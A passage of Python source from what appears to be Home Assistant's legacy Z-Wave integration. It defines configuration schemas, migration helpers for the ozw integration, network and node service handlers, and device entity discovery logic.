vol.Required(const.ATTR_CONFIG_PARAMETER): vol.Coerce(int),
}
)
NODE_SERVICE_SCHEMA = vol.Schema({vol.Required(const.ATTR_NODE_ID): vol.Coerce(int)})
REFRESH_ENTITY_SCHEMA = vol.Schema({vol.Required(ATTR_ENTITY_ID): cv.entity_id})
RESET_NODE_METERS_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Optional(const.ATTR_INSTANCE, default=1): vol.Coerce(int),
}
)
CHANGE_ASSOCIATION_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_ASSOCIATION): cv.string,
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_TARGET_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_GROUP): vol.Coerce(int),
vol.Optional(const.ATTR_INSTANCE, default=0x00): vol.Coerce(int),
}
)
SET_WAKEUP_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Required(const.ATTR_CONFIG_VALUE): vol.All(
vol.Coerce(int), cv.positive_int
),
}
)
HEAL_NODE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Optional(const.ATTR_RETURN_ROUTES, default=False): cv.boolean,
}
)
TEST_NODE_SCHEMA = vol.Schema(
{
vol.Required(const.ATTR_NODE_ID): vol.Coerce(int),
vol.Optional(const.ATTR_MESSAGES, default=1): cv.positive_int,
}
)
DEVICE_CONFIG_SCHEMA_ENTRY = vol.Schema(
{
vol.Optional(CONF_POLLING_INTENSITY): cv.positive_int,
vol.Optional(CONF_IGNORED, default=DEFAULT_CONF_IGNORED): cv.boolean,
vol.Optional(
CONF_INVERT_OPENCLOSE_BUTTONS, default=DEFAULT_CONF_INVERT_OPENCLOSE_BUTTONS
): cv.boolean,
vol.Optional(
CONF_INVERT_PERCENT, default=DEFAULT_CONF_INVERT_PERCENT
): cv.boolean,
vol.Optional(
CONF_REFRESH_VALUE, default=DEFAULT_CONF_REFRESH_VALUE
): cv.boolean,
vol.Optional(
CONF_REFRESH_DELAY, default=DEFAULT_CONF_REFRESH_DELAY
): cv.positive_int,
}
)
SIGNAL_REFRESH_ENTITY_FORMAT = "zwave_refresh_entity_{}"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Optional(CONF_AUTOHEAL, default=DEFAULT_CONF_AUTOHEAL): cv.boolean,
vol.Optional(CONF_CONFIG_PATH): cv.string,
vol.Optional(CONF_NETWORK_KEY): vol.All(
cv.string, vol.Match(r"(0x\w\w,\s?){15}0x\w\w")
),
vol.Optional(CONF_DEVICE_CONFIG, default={}): vol.Schema(
{cv.entity_id: DEVICE_CONFIG_SCHEMA_ENTRY}
),
vol.Optional(CONF_DEVICE_CONFIG_GLOB, default={}): vol.Schema(
{cv.string: DEVICE_CONFIG_SCHEMA_ENTRY}
),
vol.Optional(CONF_DEVICE_CONFIG_DOMAIN, default={}): vol.Schema(
{cv.string: DEVICE_CONFIG_SCHEMA_ENTRY}
),
vol.Optional(CONF_DEBUG, default=DEFAULT_DEBUG): cv.boolean,
vol.Optional(
CONF_POLLING_INTERVAL, default=DEFAULT_POLLING_INTERVAL
): cv.positive_int,
vol.Optional(CONF_USB_STICK_PATH): cv.string,
}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_get_ozw_migration_data(hass):
"""Return dict with info for migration to ozw integration."""
data_to_migrate = {}
zwave_config_entries = hass.config_entries.async_entries(DOMAIN)
if not zwave_config_entries:
_LOGGER.error("Config entry not set up")
return data_to_migrate
if hass.data.get(DATA_ZWAVE_CONFIG_YAML_PRESENT):
_LOGGER.warning(
"Remove %s from configuration.yaml "
"to avoid setting up this integration on restart "
"after completing migration to ozw",
DOMAIN,
)
config_entry = zwave_config_entries[0] # zwave only has a single config entry
ent_reg = await async_get_entity_registry(hass)
entity_entries = async_entries_for_config_entry(ent_reg, config_entry.entry_id)
unique_entries = {entry.unique_id: entry for entry in entity_entries}
dev_reg = await async_get_device_registry(hass)
for entity_values in hass.data[DATA_ENTITY_VALUES]:
node = entity_values.primary.node
unique_id = compute_value_unique_id(node, entity_values.primary)
if unique_id not in unique_entries:
continue
device_identifier, _ = node_device_id_and_name(
node, entity_values.primary.instance
)
device_entry = dev_reg.async_get_device({device_identifier}, set())
data_to_migrate[unique_id] = {
"node_id": node.node_id,
"node_instance": entity_values.primary.instance,
"device_id": device_entry.id,
"command_class": entity_values.primary.command_class,
"command_class_label": entity_values.primary.label,
"value_index": entity_values.primary.index,
"unique_id": unique_id,
"entity_entry": unique_entries[unique_id],
}
return data_to_migrate
@callback
def async_is_ozw_migrated(hass):
"""Return True if migration to ozw is done."""
ozw_config_entries = hass.config_entries.async_entries("ozw")
if not ozw_config_entries:
return False
ozw_config_entry = ozw_config_entries[0] # only one ozw entry is allowed
migrated = bool(ozw_config_entry.data.get("migrated"))
return migrated
def _obj_to_dict(obj):
"""Convert an object into a hash for debug."""
return {
key: getattr(obj, key)
for key in dir(obj)
if key[0] != "_" and not callable(getattr(obj, key))
}
def _value_name(value):
"""Return the name of the value."""
return f"{node_name(value.node)} {value.label}".strip()
def nice_print_node(node):
"""Print a nice formatted node to the output (debug method)."""
node_dict = _obj_to_dict(node)
node_dict["values"] = {
value_id: _obj_to_dict(value) for value_id, value in node.values.items()
}
_LOGGER.info("FOUND NODE %s \n%s", node.product_name, node_dict)
def get_config_value(node, value_index, tries=5):
"""Return the current configuration value for a specific index."""
try:
for value in node.values.values():
if (
value.command_class == const.COMMAND_CLASS_CONFIGURATION
and value.index == value_index
):
return value.data
except RuntimeError:
# If we get a runtime error the dict has changed while
# we was looking for a value, just do it again
return (
None if tries <= 0 else get_config_value(node, value_index, tries=tries - 1)
)
return None
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Z-Wave platform (generic part)."""
if discovery_info is None or DATA_NETWORK not in hass.data:
return False
device = hass.data[DATA_DEVICES].get(discovery_info[const.DISCOVERY_DEVICE])
if device is None:
return False
async_add_entities([device])
return True
async def async_setup(hass, config):
"""Set up Z-Wave components."""
if DOMAIN not in config:
return True
conf = config[DOMAIN]
hass.data[DATA_ZWAVE_CONFIG] = conf
hass.data[DATA_ZWAVE_CONFIG_YAML_PRESENT] = True
if not hass.config_entries.async_entries(DOMAIN):
hass.async_create_task(
hass.config_entries.flow.async_init(
DOMAIN,
context={"source": config_entries.SOURCE_IMPORT},
data={
CONF_USB_STICK_PATH: conf.get(
CONF_USB_STICK_PATH, DEFAULT_CONF_USB_STICK_PATH
),
CONF_NETWORK_KEY: conf.get(CONF_NETWORK_KEY),
},
)
)
return True
async def async_setup_entry(hass, config_entry):
"""Set up Z-Wave from a config entry.
Will automatically load components to support devices found on the network.
"""
from openzwave.group import ZWaveGroup
from openzwave.network import ZWaveNetwork
from openzwave.option import ZWaveOption
# pylint: enable=import-error
from pydispatch import dispatcher
if async_is_ozw_migrated(hass):
_LOGGER.error(
"Migration to ozw has been done. Please remove the zwave integration"
)
return False
# Merge config entry and yaml config
config = config_entry.data
if DATA_ZWAVE_CONFIG in hass.data:
config = {**config, **hass.data[DATA_ZWAVE_CONFIG]}
# Update hass.data with merged config so we can access it elsewhere
hass.data[DATA_ZWAVE_CONFIG] = config
# Load configuration
use_debug = config.get(CONF_DEBUG, DEFAULT_DEBUG)
autoheal = config.get(CONF_AUTOHEAL, DEFAULT_CONF_AUTOHEAL)
device_config = EntityValues(
config.get(CONF_DEVICE_CONFIG),
config.get(CONF_DEVICE_CONFIG_DOMAIN),
config.get(CONF_DEVICE_CONFIG_GLOB),
)
usb_path = config[CONF_USB_STICK_PATH]
_LOGGER.info("Z-Wave USB path is %s", usb_path)
# Setup options
options = ZWaveOption(
usb_path,
user_path=hass.config.config_dir,
config_path=config.get(CONF_CONFIG_PATH),
)
options.set_console_output(use_debug)
if config.get(CONF_NETWORK_KEY):
options.addOption("NetworkKey", config[CONF_NETWORK_KEY])
await hass.async_add_executor_job(options.lock)
network = hass.data[DATA_NETWORK] = ZWaveNetwork(options, autostart=False)
hass.data[DATA_DEVICES] = {}
hass.data[DATA_ENTITY_VALUES] = []
registry = await async_get_entity_registry(hass)
wsapi.async_load_websocket_api(hass)
if use_debug: # pragma: no cover
def log_all(signal, value=None):
"""Log all the signals."""
print("")
print("SIGNAL *****", signal)
if value and signal in (
ZWaveNetwork.SIGNAL_VALUE_CHANGED,
ZWaveNetwork.SIGNAL_VALUE_ADDED,
ZWaveNetwork.SIGNAL_SCENE_EVENT,
ZWaveNetwork.SIGNAL_NODE_EVENT,
ZWaveNetwork.SIGNAL_AWAKE_NODES_QUERIED,
ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED,
ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED_SOME_DEAD,
):
pprint(_obj_to_dict(value))
print("")
dispatcher.connect(log_all, weak=False)
def value_added(node, value):
"""Handle new added value to a node on the network."""
# Check if this value should be tracked by an existing entity
for values in hass.data[DATA_ENTITY_VALUES]:
values.check_value(value)
for schema in DISCOVERY_SCHEMAS:
if not check_node_schema(node, schema):
continue
if not check_value_schema(
value, schema[const.DISC_VALUES][const.DISC_PRIMARY]
):
continue
values = ZWaveDeviceEntityValues(
hass, schema, value, config, device_config, registry
)
# We create a new list and update the reference here so that
# the list can be safely iterated over in the main thread
new_values = hass.data[DATA_ENTITY_VALUES] + [values]
hass.data[DATA_ENTITY_VALUES] = new_values
platform = EntityPlatform(
hass=hass,
logger=_LOGGER,
domain=DOMAIN,
platform_name=DOMAIN,
platform=None,
scan_interval=DEFAULT_SCAN_INTERVAL,
entity_namespace=None,
)
platform.config_entry = config_entry
def node_added(node):
"""Handle a new node on the network."""
entity = ZWaveNodeEntity(node, network)
async def _add_node_to_component():
if hass.data[DATA_DEVICES].get(entity.unique_id):
return
name = node_name(node)
generated_id = generate_entity_id(DOMAIN + ".{}", name, [])
node_config = device_config.get(generated_id)
if node_config.get(CONF_IGNORED):
_LOGGER.info(
"Ignoring node entity %s due to device settings", generated_id
)
return
hass.data[DATA_DEVICES][entity.unique_id] = entity
await platform.async_add_entities([entity])
if entity.unique_id:
hass.async_add_job(_add_node_to_component())
return
@callback
def _on_ready(sec):
_LOGGER.info("Z-Wave node %d ready after %d seconds", entity.node_id, sec)
hass.async_add_job(_add_node_to_component)
@callback
def _on_timeout(sec):
_LOGGER.warning(
"Z-Wave node %d not ready after %d seconds, continuing anyway",
entity.node_id,
sec,
)
hass.async_add_job(_add_node_to_component)
hass.add_job(check_has_unique_id, entity, _on_ready, _on_timeout)
def node_removed(node):
node_id = node.node_id
node_key = f"node-{node_id}"
for key in list(hass.data[DATA_DEVICES]):
if key is None:
continue
if not key.startswith(f"{node_id}-"):
continue
entity = hass.data[DATA_DEVICES][key]
_LOGGER.debug(
"Removing Entity - value: %s - entity_id: %s", key, entity.entity_id
)
hass.add_job(entity.node_removed())
del hass.data[DATA_DEVICES][key]
entity = hass.data[DATA_DEVICES][node_key]
hass.add_job(entity.node_removed())
del hass.data[DATA_DEVICES][node_key]
hass.add_job(_remove_device(node))
async def _remove_device(node):
dev_reg = await async_get_device_registry(hass)
identifier, name = node_device_id_and_name(node)
device = dev_reg.async_get_device(identifiers={identifier})
if device is not None:
_LOGGER.debug("Removing Device - %s - %s", device.id, name)
dev_reg.async_remove_device(device.id)
def network_ready():
"""Handle the query of all awake nodes."""
_LOGGER.info(
"Z-Wave network is ready for use. All awake nodes "
"have been queried. Sleeping nodes will be "
"queried when they awake"
)
hass.bus.fire(const.EVENT_NETWORK_READY)
def network_complete():
"""Handle the querying of all nodes on network."""
_LOGGER.info(
"Z-Wave network is complete. All nodes on the network have been queried"
)
hass.bus.fire(const.EVENT_NETWORK_COMPLETE)
def network_complete_some_dead():
"""Handle the querying of all nodes on network."""
_LOGGER.info(
"Z-Wave network is complete. All nodes on the network "
"have been queried, but some nodes are marked dead"
)
hass.bus.fire(const.EVENT_NETWORK_COMPLETE_SOME_DEAD)
dispatcher.connect(value_added, ZWaveNetwork.SIGNAL_VALUE_ADDED, weak=False)
dispatcher.connect(node_added, ZWaveNetwork.SIGNAL_NODE_ADDED, weak=False)
dispatcher.connect(node_removed, ZWaveNetwork.SIGNAL_NODE_REMOVED, weak=False)
dispatcher.connect(
network_ready, ZWaveNetwork.SIGNAL_AWAKE_NODES_QUERIED, weak=False
)
dispatcher.connect(
network_complete, ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED, weak=False
)
dispatcher.connect(
network_complete_some_dead,
ZWaveNetwork.SIGNAL_ALL_NODES_QUERIED_SOME_DEAD,
weak=False,
)
def add_node(service):
"""Switch into inclusion mode."""
_LOGGER.info("Z-Wave add_node have been initialized")
network.controller.add_node()
def add_node_secure(service):
"""Switch into secure inclusion mode."""
_LOGGER.info("Z-Wave add_node_secure have been initialized")
network.controller.add_node(True)
def remove_node(service):
"""Switch into exclusion mode."""
_LOGGER.info("Z-Wave remove_node have been initialized")
network.controller.remove_node()
def cancel_command(service):
"""Cancel a running controller command."""
_LOGGER.info("Cancel running Z-Wave command")
network.controller.cancel_command()
def heal_network(service):
"""Heal the network."""
_LOGGER.info("Z-Wave heal running")
network.heal()
def soft_reset(service):
"""Soft reset the controller."""
_LOGGER.info("Z-Wave soft_reset have been initialized")
network.controller.soft_reset()
def test_network(service):
"""Test the network by sending commands to all the nodes."""
_LOGGER.info("Z-Wave test_network have been initialized")
network.test()
def stop_network(_service_or_event):
"""Stop Z-Wave network."""
_LOGGER.info("Stopping Z-Wave network")
network.stop()
if hass.state == CoreState.running:
hass.bus.fire(const.EVENT_NETWORK_STOP)
async def rename_node(service):
"""Rename a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
name = service.data.get(ATTR_NAME)
node.name = name
_LOGGER.info("Renamed Z-Wave node %d to %s", node_id, name)
update_ids = service.data.get(const.ATTR_UPDATE_IDS)
# We want to rename the device, the node entity,
# and all the contained entities
node_key = f"node-{node_id}"
entity = hass.data[DATA_DEVICES][node_key]
await entity.node_renamed(update_ids)
for key in list(hass.data[DATA_DEVICES]):
if not key.startswith(f"{node_id}-"):
continue
entity = hass.data[DATA_DEVICES][key]
await entity.value_renamed(update_ids)
async def rename_value(service):
"""Rename a node value."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
value = node.values[value_id]
name = service.data.get(ATTR_NAME)
value.label = name
_LOGGER.info(
"Renamed Z-Wave value (Node %d Value %d) to %s", node_id, value_id, name
)
update_ids = service.data.get(const.ATTR_UPDATE_IDS)
value_key = f"{node_id}-{value_id}"
entity = hass.data[DATA_DEVICES][value_key]
await entity.value_renamed(update_ids)
def set_poll_intensity(service):
"""Set the polling intensity of a node value."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
value = node.values[value_id]
intensity = service.data.get(const.ATTR_POLL_INTENSITY)
if intensity == 0:
if value.disable_poll():
_LOGGER.info("Polling disabled (Node %d Value %d)", node_id, value_id)
return
_LOGGER.info(
"Polling disabled failed (Node %d Value %d)", node_id, value_id
)
else:
if value.enable_poll(intensity):
_LOGGER.info(
"Set polling intensity (Node %d Value %d) to %s",
node_id,
value_id,
intensity,
)
return
_LOGGER.info(
"Set polling intensity failed (Node %d Value %d)", node_id, value_id
)
def remove_failed_node(service):
"""Remove failed node."""
node_id = service.data.get(const.ATTR_NODE_ID)
_LOGGER.info("Trying to remove zwave node %d", node_id)
network.controller.remove_failed_node(node_id)
def replace_failed_node(service):
"""Replace failed node."""
node_id = service.data.get(const.ATTR_NODE_ID)
_LOGGER.info("Trying to replace zwave node %d", node_id)
network.controller.replace_failed_node(node_id)
def set_config_parameter(service):
"""Set a config parameter to a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
param = service.data.get(const.ATTR_CONFIG_PARAMETER)
selection = service.data.get(const.ATTR_CONFIG_VALUE)
size = service.data.get(const.ATTR_CONFIG_SIZE)
for value in node.get_values(
class_id=const.COMMAND_CLASS_CONFIGURATION
).values():
if value.index != param:
continue
if value.type == const.TYPE_BOOL:
value.data = int(selection == "True")
_LOGGER.info(
"Setting configuration parameter %s on Node %s with bool selection %s",
param,
node_id,
str(selection),
)
return
if value.type == const.TYPE_LIST:
value.data = str(selection)
_LOGGER.info(
"Setting configuration parameter %s on Node %s with list selection %s",
param,
node_id,
str(selection),
)
return
if value.type == const.TYPE_BUTTON:
network.manager.pressButton(value.value_id)
network.manager.releaseButton(value.value_id)
_LOGGER.info(
"Setting configuration parameter %s on Node %s "
"with button selection %s",
param,
node_id,
selection,
)
return
value.data = int(selection)
_LOGGER.info(
"Setting configuration parameter %s on Node %s with selection %s",
param,
node_id,
selection,
)
return
node.set_config_param(param, selection, size)
_LOGGER.info(
"Setting unknown configuration parameter %s on Node %s with selection %s",
param,
node_id,
selection,
)
def refresh_node_value(service):
"""Refresh the specified value from a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
node.values[value_id].refresh()
_LOGGER.info("Node %s value %s refreshed", node_id, value_id)
def set_node_value(service):
"""Set the specified value on a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
value_id = service.data.get(const.ATTR_VALUE_ID)
value = service.data.get(const.ATTR_CONFIG_VALUE)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
node.values[value_id].data = value
_LOGGER.info("Node %s value %s set to %s", node_id, value_id, value)
def print_config_parameter(service):
"""Print a config parameter from a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
param = service.data.get(const.ATTR_CONFIG_PARAMETER)
_LOGGER.info(
"Config parameter %s on Node %s: %s",
param,
node_id,
get_config_value(node, param),
)
def print_node(service):
"""Print all information about z-wave node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
nice_print_node(node)
def set_wakeup(service):
"""Set wake-up interval of a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
value = service.data.get(const.ATTR_CONFIG_VALUE)
if node.can_wake_up():
for value_id in node.get_values(class_id=const.COMMAND_CLASS_WAKE_UP):
node.values[value_id].data = value
_LOGGER.info("Node %s wake-up set to %d", node_id, value)
else:
_LOGGER.info("Node %s is not wakeable", node_id)
def change_association(service):
"""Change an association in the zwave network."""
association_type = service.data.get(const.ATTR_ASSOCIATION)
node_id = service.data.get(const.ATTR_NODE_ID)
target_node_id = service.data.get(const.ATTR_TARGET_NODE_ID)
group = service.data.get(const.ATTR_GROUP)
instance = service.data.get(const.ATTR_INSTANCE)
node = ZWaveGroup(group, network, node_id)
if association_type == "add":
node.add_association(target_node_id, instance)
_LOGGER.info(
"Adding association for node:%s in group:%s "
"target node:%s, instance=%s",
node_id,
group,
target_node_id,
instance,
)
if association_type == "remove":
node.remove_association(target_node_id, instance)
_LOGGER.info(
"Removing association for node:%s in group:%s "
"target node:%s, instance=%s",
node_id,
group,
target_node_id,
instance,
)
async def async_refresh_entity(service):
"""Refresh values that specific entity depends on."""
entity_id = service.data.get(ATTR_ENTITY_ID)
async_dispatcher_send(hass, SIGNAL_REFRESH_ENTITY_FORMAT.format(entity_id))
def refresh_node(service):
"""Refresh all node info."""
node_id = service.data.get(const.ATTR_NODE_ID)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
node.refresh_info()
def reset_node_meters(service):
"""Reset meter counters of a node."""
node_id = service.data.get(const.ATTR_NODE_ID)
instance = service.data.get(const.ATTR_INSTANCE)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
for value in node.get_values(class_id=const.COMMAND_CLASS_METER).values():
if value.index != const.INDEX_METER_RESET:
continue
if value.instance != instance:
continue
network.manager.pressButton(value.value_id)
network.manager.releaseButton(value.value_id)
_LOGGER.info(
"Resetting meters on node %s instance %s....", node_id, instance
)
return
_LOGGER.info(
"Node %s on instance %s does not have resettable meters", node_id, instance
)
def heal_node(service):
"""Heal a node on the network."""
node_id = service.data.get(const.ATTR_NODE_ID)
update_return_routes = service.data.get(const.ATTR_RETURN_ROUTES)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
_LOGGER.info("Z-Wave node heal running for node %s", node_id)
node.heal(update_return_routes)
def test_node(service):
"""Send test messages to a node on the network."""
node_id = service.data.get(const.ATTR_NODE_ID)
messages = service.data.get(const.ATTR_MESSAGES)
node = network.nodes[node_id] # pylint: disable=unsubscriptable-object
_LOGGER.info("Sending %s test-messages to node %s", messages, node_id)
node.test(messages)
def start_zwave(_service_or_event):
"""Startup Z-Wave network."""
_LOGGER.info("Starting Z-Wave network...")
network.start()
hass.bus.fire(const.EVENT_NETWORK_START)
async def _check_awaked():
"""Wait for Z-wave awaked state (or timeout) and finalize start."""
_LOGGER.debug("network state: %d %s", network.state, network.state_str)
start_time = dt_util.utcnow()
while True:
waited = int((dt_util.utcnow() - start_time).total_seconds())
if network.state >= network.STATE_AWAKED:
# Need to be in STATE_AWAKED before talking to nodes.
_LOGGER.info("Z-Wave ready after %d seconds", waited)
break
if waited >= const.NETWORK_READY_WAIT_SECS:
# Wait up to NETWORK_READY_WAIT_SECS seconds for the Z-Wave
# network to be ready.
_LOGGER.warning(
"Z-Wave not ready after %d seconds, continuing anyway", waited
)
_LOGGER.info(
"final network state: %d %s", network.state, network.state_str
)
break
await asyncio.sleep(1)
hass.async_add_job(_finalize_start)
hass.add_job(_check_awaked)
def _finalize_start():
"""Perform final initializations after Z-Wave network is awaked."""
polling_interval = convert(config.get(CONF_POLLING_INTERVAL), int)
if polling_interval is not None:
network.set_poll_interval(polling_interval, False)
poll_interval = network.get_poll_interval()
_LOGGER.info("Z-Wave polling interval set to %d ms", poll_interval)
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_network)
# Register node services for Z-Wave network
hass.services.register(DOMAIN, const.SERVICE_ADD_NODE, add_node)
hass.services.register(DOMAIN, const.SERVICE_ADD_NODE_SECURE, add_node_secure)
hass.services.register(DOMAIN, const.SERVICE_REMOVE_NODE, remove_node)
hass.services.register(DOMAIN, const.SERVICE_CANCEL_COMMAND, cancel_command)
hass.services.register(DOMAIN, const.SERVICE_HEAL_NETWORK, heal_network)
hass.services.register(DOMAIN, const.SERVICE_SOFT_RESET, soft_reset)
hass.services.register(DOMAIN, const.SERVICE_TEST_NETWORK, test_network)
hass.services.register(DOMAIN, const.SERVICE_STOP_NETWORK, stop_network)
hass.services.register(
DOMAIN, const.SERVICE_RENAME_NODE, rename_node, schema=RENAME_NODE_SCHEMA
)
hass.services.register(
DOMAIN, const.SERVICE_RENAME_VALUE, rename_value, schema=RENAME_VALUE_SCHEMA
)
hass.services.register(
DOMAIN,
const.SERVICE_SET_CONFIG_PARAMETER,
set_config_parameter,
schema=SET_CONFIG_PARAMETER_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_SET_NODE_VALUE,
set_node_value,
schema=SET_NODE_VALUE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_REFRESH_NODE_VALUE,
refresh_node_value,
schema=REFRESH_NODE_VALUE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_PRINT_CONFIG_PARAMETER,
print_config_parameter,
schema=PRINT_CONFIG_PARAMETER_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_REMOVE_FAILED_NODE,
remove_failed_node,
schema=NODE_SERVICE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_REPLACE_FAILED_NODE,
replace_failed_node,
schema=NODE_SERVICE_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_CHANGE_ASSOCIATION,
change_association,
schema=CHANGE_ASSOCIATION_SCHEMA,
)
hass.services.register(
DOMAIN, const.SERVICE_SET_WAKEUP, set_wakeup, schema=SET_WAKEUP_SCHEMA
)
hass.services.register(
DOMAIN, const.SERVICE_PRINT_NODE, print_node, schema=NODE_SERVICE_SCHEMA
)
hass.services.register(
DOMAIN,
const.SERVICE_REFRESH_ENTITY,
async_refresh_entity,
schema=REFRESH_ENTITY_SCHEMA,
)
hass.services.register(
DOMAIN, const.SERVICE_REFRESH_NODE, refresh_node, schema=NODE_SERVICE_SCHEMA
)
hass.services.register(
DOMAIN,
const.SERVICE_RESET_NODE_METERS,
reset_node_meters,
schema=RESET_NODE_METERS_SCHEMA,
)
hass.services.register(
DOMAIN,
const.SERVICE_SET_POLL_INTENSITY,
set_poll_intensity,
schema=SET_POLL_INTENSITY_SCHEMA,
)
hass.services.register(
DOMAIN, const.SERVICE_HEAL_NODE, heal_node, schema=HEAL_NODE_SCHEMA
)
hass.services.register(
DOMAIN, const.SERVICE_TEST_NODE, test_node, schema=TEST_NODE_SCHEMA
)
# Setup autoheal
if autoheal:
_LOGGER.info("Z-Wave network autoheal is enabled")
async_track_time_change(hass, heal_network, hour=0, minute=0, second=0)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_zwave)
hass.services.async_register(DOMAIN, const.SERVICE_START_NETWORK, start_zwave)
for entry_component in PLATFORMS:
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(config_entry, entry_component)
)
return True
class ZWaveDeviceEntityValues:
"""Manages entity access to the underlying zwave value objects."""
def __init__(
self, hass, schema, primary_value, zwave_config, device_config, registry
):
"""Initialize the values object with the passed entity schema."""
self._hass = hass
self._zwave_config = zwave_config
self._device_config = device_config
self._schema = copy.deepcopy(schema)
self._values = {}
self._entity = None
self._workaround_ignore = False
self._registry = registry
for name in self._schema[const.DISC_VALUES].keys():
self._values[name] = None
self._schema[const.DISC_VALUES][name][const.DISC_INSTANCE] = [
primary_value.instance
]
self._values[const.DISC_PRIMARY] = primary_value
self._node = primary_value.node
self._schema[const.DISC_NODE_ID] = [self._node.node_id]
# Check values that have already been discovered for node
for value in self._node.values.values():
self.check_value(value)
self._check_entity_ready()
def __getattr__(self, name):
"""Get the specified value for this entity."""
return self._values[name]
def __iter__(self):
"""Allow iteration over all values."""
return iter(self._values.values())
def check_value(self, value):
"""Check if the new value matches a missing value for this entity.
If a match is found, it is added to the values mapping.
"""
if not check_node_schema(value.node, self._schema):
return
for name in self._values:
if self._values[name] is not None:
continue
if not check_value_schema(value, self._schema[const.DISC_VALUES][name]):
continue
self._values[name] = value
if self._entity:
self._entity.value_added()
self._entity.value_changed()
self._check_entity_ready()
def _check_entity_ready(self):
"""Check if all required values are discovered and create entity."""
if self._workaround_ignore:
return
if self._entity is not None:
return
for name in self._schema[const.DISC_VALUES]:
if self._values[name] is None and not self._schema[const.DISC_VALUES][
name
].get(const.DISC_OPTIONAL):
return
component = self._schema[const.DISC_COMPONENT]
workaround_component = workaround.get_device_component_mapping(self.primary)
if workaround_component and workaround_component != component:
if workaround_component == workaround.WORKAROUND_IGNORE:
_LOGGER.info(
"Ignoring Node %d Value %d due to workaround",
self.primary.node.node_id,
self.primary.value_id,
)
# No entity will be created for this value
self._workaround_ignore = True
return
_LOGGER.debug("Using %s instead of %s", workaround_component, component)
component = workaround_component
entity_id = self._registry.async_get_entity_id(
component, DOMAIN, compute_value_unique_id(self._node, self.primary)
)
if entity_id is None:
value_name = _value_name(self.primary)
entity_id = generate_entity_id(component + ".{}", value_name, [])
node_config = self._device_config.get(entity_id)
# Configure node
_LOGGER.debug(
"Adding Node_id=%s Generic_command_class=%s, "
"Specific_command_class=%s, "
"Command_class=%s, Value type=%s, "
"Genre=%s as %s",
self._node.node_id,
self._node.generic,
self._node.specific,
self.primary.command_class,
self.primary.type,
self.primary.genre,
component,
)
if node_config.get(CONF_IGNORED):
_LOGGER.info("Ignoring entity %s due to device settings", entity_id)
# No entity will be created for this value
self._workaround_ignore = True
return
polling_intensity = convert(node_config.get(CONF_POLLING_INTENSITY), int)
if polling_intensity:
self.primary.enable_poll(polling_intensity)
platform = import_module(f".{component}", __name__)
device = platform.get_device(
node=self._node, values=self, node_config=node_config, hass=self._hass
)
if device is None:
# No entity will be created for this value
self._workaround_ignore = True
return
self._entity = device
@callback
def _on_ready(sec):
_LOGGER.info(
"Z-Wave entity %s (node_id: %d) ready after %d seconds",
device.name,
self._node.node_id,
sec,
)
self._hass.async_add_job(discover_device, component, device)
@callback
def _on_timeout(sec):
_LOGGER.warning(
"Z-Wave entity %s (node_id: %d) not ready after %d seconds, "
"continuing anyway",
device.name,
self._node.node_id,
sec,
)
self._hass.async_add_job(discover_device, component, device)
async def discover_device(component, device):
"""Put device in a dictionary and call discovery on it."""
if self._hass.data[DATA_DEVICES].get(device.unique_id):
return
self._hass.data[DATA_DEVICES][device.unique_id] = device
if component in PLATFORMS:
async_dispatcher_send(self._hass, f"zwave_new_{component}", device)
else:
await discovery.async_load_platform(
self._hass,
component,
DOMAIN,
{const.DISCOVERY_DEVICE: device.unique_id},
self._zwave_config,
)
if device.unique_id:
self._hass.add_job(discover_device, component, device)
else:
self._hass.add_job(check_has_unique_id, device, _on_ready, _on_timeout)
class ZWaveDeviceEntity(ZWaveBaseEntity):
"""Representation of a Z-Wave node entity."""
def __init__(self, values, domain):
"""Initialize the z-Wave device."""
super().__init__()
from openzwave.network import ZWaveNetwork
from pydispatch import dispatcher
self.values = values
self.node = values.primary.node
self.values.primary.set_change_verified(False)
self._name = _value_name(self.values.primary)
self._unique_id = self._compute_unique_id()
self._update_attributes()
dispatcher.connect(
